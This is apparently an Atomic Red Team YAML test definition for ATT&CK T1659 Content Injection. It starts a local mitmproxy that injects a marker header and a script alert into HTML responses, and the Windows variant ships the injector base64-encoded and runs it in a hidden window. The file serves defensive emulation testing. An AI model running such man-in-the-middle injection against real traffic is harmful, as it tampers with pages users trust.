Wai Linn Oo
53c52a2d58
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
102 lines
5.8 KiB
YAML
102 lines
5.8 KiB
YAML
attack_technique: T1659
|
|
display_name: Content Injection
|
|
atomic_tests:
|
|
- name: MITM Proxy Injection
|
|
description: Start mitmdump and verify injected header and HTML content.
|
|
supported_platforms:
|
|
- macos
|
|
- linux
|
|
dependencies:
|
|
- description: python3 must be installed
|
|
prereq_command: |
|
|
command -v python3
|
|
get_prereq_command: |
|
|
brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
|
|
|
|
- description: curl must be installed
|
|
prereq_command: |
|
|
command -v curl
|
|
get_prereq_command: |
|
|
brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
|
|
|
|
- description: pipx must be installed
|
|
prereq_command: |
|
|
pipx --version
|
|
get_prereq_command: |
|
|
brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
|
|
|
|
- description: mitmproxy must be installed
|
|
prereq_command: |
|
|
pipx list | grep mitmproxy
|
|
get_prereq_command: |
|
|
pipx install mitmproxy || brew install mitmproxy
|
|
- description: mitmdump must be running on port 8080
|
|
prereq_command: |
|
|
lsof -i tcp:8080 | grep mitmdump
|
|
get_prereq_command: |
|
|
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
|
|
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
|
|
sleep 5
|
|
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
|
|
executor:
|
|
name: bash
|
|
command: |
|
|
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
|
|
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
|
|
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
|
|
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
|
|
cleanup_command: |
|
|
rm -rf /tmp/atomic_t1659_inject.py
|
|
rm -rf /tmp/atomic_t1659.log
|
|
rm -rf /tmp/curl_out.txt
|
|
rm -rf /tmp/atomic_t1659_page.html
|
|
pkill -f mitmdump || true
|
|
|
|
- name: MITM Proxy Injection (Windows)
|
|
description: Start mitmdump proxy with injection script in the background.
|
|
supported_platforms:
|
|
- windows
|
|
dependencies:
|
|
- description: Python must be installed
|
|
prereq_command: |
|
|
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
winget install --id Python.Python.3 -e
|
|
|
|
- description: curl must be installed
|
|
prereq_command: |
|
|
if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
winget install --id cURL.cURL -e
|
|
|
|
- description: mitmproxy must be installed and in PATH
|
|
prereq_command: |
|
|
if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
python -m pip install mitmproxy
|
|
- description: mitmdump must be running on port 8080
|
|
prereq_command: |
|
|
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
|
|
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
|
|
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
|
|
Start-Sleep -Seconds 5
|
|
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
|
|
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
|
|
$OutPath = "$env:TEMP\atomic_t1659_page.html"
|
|
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
|
|
$Content = Get-Content -Path $OutPath -Raw
|
|
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
|
|
cleanup_command: |
|
|
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
|
|
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
|
|
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
|
|
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
|
|
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
|